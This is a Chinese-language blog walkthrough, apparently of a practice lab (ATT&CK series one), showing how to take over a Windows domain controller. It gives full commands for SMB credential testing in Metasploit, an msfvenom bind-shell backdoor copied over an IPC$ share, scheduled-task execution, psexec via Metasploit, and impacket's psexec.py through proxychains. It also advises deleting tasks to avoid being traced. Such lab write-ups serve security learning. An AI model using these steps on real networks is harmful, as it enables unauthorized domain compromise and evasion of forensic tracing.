内网横向渗透 之 ATT&CK系列一 之 拿下域控制器
信息收集
信息收集 域控制器的相关信息:
通过arp扫描发现域控制器的ip地址为:192.168.52.138,尝试使用msf的smb_login模块登录smb是否成功
1 search smb_login 2 use 0 3 set rhosts 192.168.52.138 4 set smbpass hongrisec@2022 5 set smbuser Administrator 6 set smbdomain GOD 7 run
用户名、密码、domain我在前面一篇文章中已经获取到了,所以这里不再赘述,如果还不了解获取方式的,烦请移步至文章《内网横向渗透 之 ATT&CK系列一 之 信息收集》中查看(已附超链接),上图表示用户名以及密码是正确的。
拿下域控
一、IPC$搭配msf木马
因为是内网域,目标主机不出网,所以 payload 使用 正向连接 (bind)
1 # 生成木马 2 msfvenom -p windows/meterpreter/bind_tcp RHOST=192.168.52.138 LPORT=3333 -f exe -o bind.exe 3 # 然后通过蚁剑上传至跳板机(win7)
使用 跳板机(win7) 进行空管链接(IPC$)
1 # IPC$ 远程登录目标主机 2 net use \\192.168.52.138\ipc$ /user:Administrator "hongrisec@2022"
提示:命令执行成功,下一步
1 # 复制后门到域控的temp目录下 2 copy bind.exe \\192.168.52.138\c$\bind.exe
查看是否上传成功:
1 # 查看指定目录下的文件 2 dir \\192.168.52.138\c$
创建计划任务
1 # 查看目标主机的时间 2 net time \\192.168.52.138 3 # 创建该时间之后的某个时刻计划任务,任务名 spmonkey 4 at \\192.168.52.138 12:40:00 c:\bind.exe 7 # 删除创建的任务 8 at \\192.168.52.138 2 /delete
返回msf监听端口
1 exit # 退出shell模式 2 backgroud # 后台运行session 3 use exploit/multi/handler 4 set payload windows/meterpreter/bind_tcp 5 set RHOST 192.168.52.138 6 set LPORT 3333 7 run 8 # 静候计划任务执行
当计划任务的时间到了后,依然没有会话回来,这个拿shell方式宣告失败!
注:计划任务执行完后,记得使用命令删除任务,不然会被溯源。
二、利用msf中的psexec模块拿下域控
psexec科普
psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开机3389端口,只需要对方开启admin$共享(该共享默认开启)。但是,假如目标主机开启了防火墙,psexec也是不能使用的,会提示找不到网络路径。由于psexec是windows提供的工具,所以杀毒软件会将其添加到白名单中。
psexec的基本原理是:通过管道在远程目标机器上创建一个psexec服务,并在本地磁盘中生成一个名为"PSEXESVC"的二进制文件。然后,通过psexec服务运行命令,运行结束后删除服务。
在使用psexec执行远程命令时,会在目标系统中创建一个psexec服务。命令执行后,psexec服务将会被自动删除。由于创建或删除服务时会产生大量的日志,所以会在攻击溯源时通过日志反推攻击流程。
1 search psexec # 查找psexec模块 2 use exploit/windows/smb/psexec 3 set payload windows/meterpreter/bind_tcp 4 set RHOSTS 192.168.52.138 5 set SMBPass hongrisec@2022 6 set SMBUser Administrator 7 set SMBDomain GOD 8 run
攻击成功了,但是没有生成session,这个方式也宣告失败!
三、利用python的psexec脚本拿下域控
经过查阅各种资料,发现有个psexec的python脚本,在这里感谢写这个脚本的师傅:beto (@agsolino)。
在kali中使用git获取脚本:git clone https://github.com/CoreSecurity/impacket.git,将kali的python版本修改至 3.*,cd进入impacket目录,运行python setup.py install,待执行完成后,准备工作就完成了。
开始拿下域控:
1、查找psexec脚本所在目录并进入目录
1 find . -name "psexec*"
2、使用代理隧道运行psexec.py脚本
1 proxychains python psexec.py 'Administrator:hongrisec@2022@192.168.52.138'
其中 ' ' 的值分别为 用户名:密码@目标主机ip地址
成功返回shell,查看权限
进入目录删除前面上传的msf木马
1 cd C:\ 2 del/f/s/q C:\bind.exe
鸣谢
beto (@agsolino)
结语
到这里,拿下域控后,ATT&CK系列一 也就告一段落了,涉及到的知识点比较多,有不懂的师傅可以加我vx:fbi041699,备注明来意喔!